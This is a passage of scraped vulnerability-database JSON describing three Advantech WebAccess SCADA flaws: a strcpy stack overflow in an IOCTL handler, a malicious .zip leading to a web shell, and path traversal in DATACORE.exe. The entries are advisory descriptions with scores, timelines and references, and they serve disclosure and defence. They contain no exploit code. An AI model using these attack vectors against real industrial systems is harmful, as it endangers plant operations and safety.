"ZDI-16-137", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-137", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-137" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C76 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-137" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3166", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-137", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-137" } ] }, "id": "VAR-201602-0476", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:55:52.924000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-137" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-137" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-137" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-137" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-137" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-137" } ], "trust": 0.7 } }
var-202305-2664
Vulnerability from variot
If an attacker can trick an authenticated user into loading a maliciously crafted .zip file onto Advantech WebAccess version 8.4.5, a web shell could be used to give the attacker full control of the SCADA server
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202305-2664", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.0, "vendor": "advantech", "version": "8.4.5" } ], "sources": [ { "db": "NVD", "id": "CVE-2023-2866" } ] }, "cve": "CVE-2023-2866", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2023-2866", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "ics-cert@hq.dhs.gov", "availabilityImpact": "HIGH", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.3, "id": "CVE-2023-2866", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2023-2866", "trust": 1.0, "value": "HIGH" }, { "author": "ics-cert@hq.dhs.gov", "id": "CVE-2023-2866", "trust": 1.0, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202305-2621", "trust": 0.6, "value": "HIGH" } ] } ], "sources": [ { "db": "CNNVD", "id": "CNNVD-202305-2621" }, { "db": "NVD", "id": "CVE-2023-2866" }, { "db": "NVD", "id": "CVE-2023-2866" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "\nIf an attacker can trick an authenticated user into loading a maliciously crafted .zip file onto Advantech WebAccess version 8.4.5, a web shell could be used to give the attacker full control of the SCADA server", "sources": [ { "db": "NVD", "id": "CVE-2023-2866" }, { "db": "VULMON", "id": "CVE-2023-2866" } ], "trust": 0.99 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ICS CERT", "id": "ICSA-23-150-01", "trust": 1.7 }, { "db": "NVD", "id": "CVE-2023-2866", "trust": 1.7 }, { "db": "AUSCERT", "id": "ESB-2023.3083", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202305-2621", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2023-2866", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2023-2866" }, { "db": "CNNVD", "id": "CNNVD-202305-2621" }, { "db": "NVD", "id": "CVE-2023-2866" } ] }, "id": "VAR-202305-2664", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.43470696 }, "last_update_date": "2024-08-14T14:10:01.672000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess/SCADA Repair measures for data forgery problem vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=241941" } ], "sources": [ { "db": "CNNVD", "id": "CNNVD-202305-2621" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-351", "trust": 1.0 }, { "problemtype": "CWE-345", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2023-2866" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-150-01" }, { "trust": 0.6, "url": "https://cxsecurity.com/cveshow/cve-2023-2866/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2023.3083" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/351.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "VULMON", "id": "CVE-2023-2866" }, { "db": "CNNVD", "id": "CNNVD-202305-2621" }, { "db": "NVD", "id": "CVE-2023-2866" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2023-2866" }, { "db": "CNNVD", "id": "CNNVD-202305-2621" }, { "db": "NVD", "id": "CVE-2023-2866" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-06-07T00:00:00", "db": "VULMON", "id": "CVE-2023-2866" }, { "date": "2023-05-31T00:00:00", "db": "CNNVD", "id": "CNNVD-202305-2621" }, { "date": "2023-06-07T21:15:13.277000", "db": "NVD", "id": "CVE-2023-2866" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-06-07T00:00:00", "db": "VULMON", "id": "CVE-2023-2866" }, { "date": "2023-06-16T00:00:00", "db": "CNNVD", "id": "CNNVD-202305-2621" }, { "date": "2023-06-15T16:20:13.673000", "db": "NVD", "id": "CVE-2023-2866" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-202305-2621" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess/SCADA Data forgery problem vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-202305-2621" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "data forgery", "sources": [ { "db": "CNNVD", "id": "CNNVD-202305-2621" } ], "trust": 0.6 } }
var-202005-0335
Vulnerability from variot
Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application’s control. Advantech WebAccess Node Exists in a past traversal vulnerability.Information is tampered with and service operation is interrupted (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x0000791e in DATACORE.exe. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required. Advantech WebAccess Node could allow a remote malicious user to traverse directories on the system, caused by improper validation of user request. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to overwrite arbitrary files on the system
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess/scada", "scope": null, "trust": 2.1, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.8, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "gte", "trust": 0.6, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "9.0.0" } ], "sources": [ { "db": "IVD", "id": "ec7b8103-b626-4a4f-985f-bd5bdbb95287" }, { "db": "IVD", "id": "2d8fc349-4a01-4fa6-8792-ddceae01196f" }, { "db": "ZDI", "id": "ZDI-20-595" }, { "db": "ZDI", "id": "ZDI-20-589" }, { "db": "ZDI", "id": "ZDI-20-605" }, { "db": "CNVD", "id": "CNVD-2020-29743" }, { "db": "JVNDB", "id": "JVNDB-2020-005162" }, { "db": "NVD", "id": "CVE-2020-12006" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005162" } ] }, "credits": { "_id": null, "data": "Z0mb1E", "sources": [ { "db": "ZDI", "id": "ZDI-20-595" }, { "db": "ZDI", "id": "ZDI-20-589" }, { "db": "ZDI", "id": "ZDI-20-605" } ], "trust": 2.1 }, "cve": "CVE-2020-12006", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2020-12006", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "JVNDB-2020-005162", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2020-29743", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ec7b8103-b626-4a4f-985f-bd5bdbb95287", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "2d8fc349-4a01-4fa6-8792-ddceae01196f", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-164641", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12006", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 2.1, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12006", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-005162", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2020-12006", "trust": 2.1, "value": "CRITICAL" }, { "author": "nvd@nist.gov", "id": "CVE-2020-12006", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "JVNDB-2020-005162", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2020-29743", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202005-306", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "ec7b8103-b626-4a4f-985f-bd5bdbb95287", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "2d8fc349-4a01-4fa6-8792-ddceae01196f", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-164641", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2020-12006", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "ec7b8103-b626-4a4f-985f-bd5bdbb95287" }, { "db": "IVD", "id": "2d8fc349-4a01-4fa6-8792-ddceae01196f" }, { "db": "ZDI", "id": "ZDI-20-595" }, { "db": "ZDI", "id": "ZDI-20-589" }, { "db": "ZDI", "id": "ZDI-20-605" }, { "db": "CNVD", "id": "CNVD-2020-29743" }, { "db": "VULHUB", "id": "VHN-164641" }, { "db": "VULMON", "id": "CVE-2020-12006" }, { "db": "JVNDB", "id": "JVNDB-2020-005162" }, { "db": "CNNVD", "id": "CNNVD-202005-306" }, { "db": "NVD", "id": "CVE-2020-12006" } ] }, "description": { "_id": null, "data": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application\u2019s control. Advantech WebAccess Node Exists in a past traversal vulnerability.Information is tampered with and service operation is interrupted (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x0000791e in DATACORE.exe. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required. Advantech WebAccess Node could allow a remote malicious user to traverse directories on the system, caused by improper validation of user request. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to overwrite arbitrary files on the system", "sources": [ { "db": "NVD", "id": "CVE-2020-12006" }, { "db": "JVNDB", "id": "JVNDB-2020-005162" }, { "db": "ZDI", "id": "ZDI-20-595" }, { "db": "ZDI", "id": "ZDI-20-589" }, { "db": "ZDI", "id": "ZDI-20-605" }, { "db": "CNVD", "id": "CNVD-2020-29743" }, { "db": "IVD", "id": "ec7b8103-b626-4a4f-985f-bd5bdbb95287" }, { "db": "IVD", "id": "2d8fc349-4a01-4fa6-8792-ddceae01196f" }, { "db": "VULHUB", "id": "VHN-164641" }, { "db": "VULMON", "id": "CVE-2020-12006" } ], "trust": 4.59 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2020-12006", "trust": 5.7 }, { "db": "ICS CERT", "id": "ICSA-20-128-01", "trust": 3.2 }, { "db": "ZDI", "id": "ZDI-20-595", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-589", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-605", "trust": 2.5 }, { "db": "CNVD", "id": "CNVD-2020-29743", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-202005-306", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU93292753", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2020-005162", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9905", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9995", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9901", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2020.1646", "trust": 0.6 }, { "db": "NSFOCUS", "id": "47349", "trust": 0.6 }, { "db": "IVD", "id": "EC7B8103-B626-4A4F-985F-BD5BDBB95287", "trust": 0.2 }, { "db": "IVD", "id": "2D8FC349-4A01-4FA6-8792-DDCEAE01196F", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-164641", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2020-12006", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "ec7b8103-b626-4a4f-985f-bd5bdbb95287" }, { "db": "IVD", "id": "2d8fc349-4a01-4fa6-8792-ddceae01196f" }, { "db": "ZDI", "id": "ZDI-20-595" }, { "db": "ZDI", "id": "ZDI-20-589" }, { "db": "ZDI", "id": "ZDI-20-605" }, { "db": "CNVD", "id": "CNVD-2020-29743" }, { "db": "VULHUB", "id": "VHN-164641" }, { "db": "VULMON", "id": "CVE-2020-12006" }, { "db": "JVNDB", "id": "JVNDB-2020-005162" }, { "db": "CNNVD", "id": "CNNVD-202005-306" }, { "db": "NVD", "id": "CVE-2020-12006" } ] }, "id": "VAR-202005-0335", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "ec7b8103-b626-4a4f-985f-bd5bdbb95287" }, { "db": "IVD", "id": "2d8fc349-4a01-4fa6-8792-ddceae01196f" }, { "db": "CNVD", "id": "CNVD-2020-29743" }, { "db": "VULHUB", "id": "VHN-164641" } ], "trust": 1.679503486666667 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "ec7b8103-b626-4a4f-985f-bd5bdbb95287" }, { "db": "IVD", "id": "2d8fc349-4a01-4fa6-8792-ddceae01196f" }, { "db": "CNVD", "id": "CNVD-2020-29743" } ] }, "last_update_date": "2024-11-23T21:59:18.650000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 2.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "title": "Top Page", "trust": 0.8, "url": "https://www.advantech.com/" }, { "title": "Patch for Advantech WebAccess Node Path Traversal Vulnerability (CNVD-2020-29743)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/218853" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-595" }, { "db": "ZDI", "id": "ZDI-20-589" }, { "db": "ZDI", "id": "ZDI-20-605" }, { "db": "CNVD", "id": "CNVD-2020-29743" }, { "db": "JVNDB", "id": "JVNDB-2020-005162" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-22", "trust": 1.9 }, { "problemtype": "CWE-23", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-164641" }, { "db": "JVNDB", "id": "JVNDB-2020-005162" }, { "db": "NVD", "id": "CVE-2020-12006" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "trust": 2.4, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-605/" }, { "trust": 2.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-589/" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-595/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12006" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12006" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu93292753/" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/47349" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.1646/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/22.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/181598" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-595" }, { "db": "ZDI", "id": "ZDI-20-589" }, { "db": "ZDI", "id": "ZDI-20-605" }, { "db": "CNVD", "id": 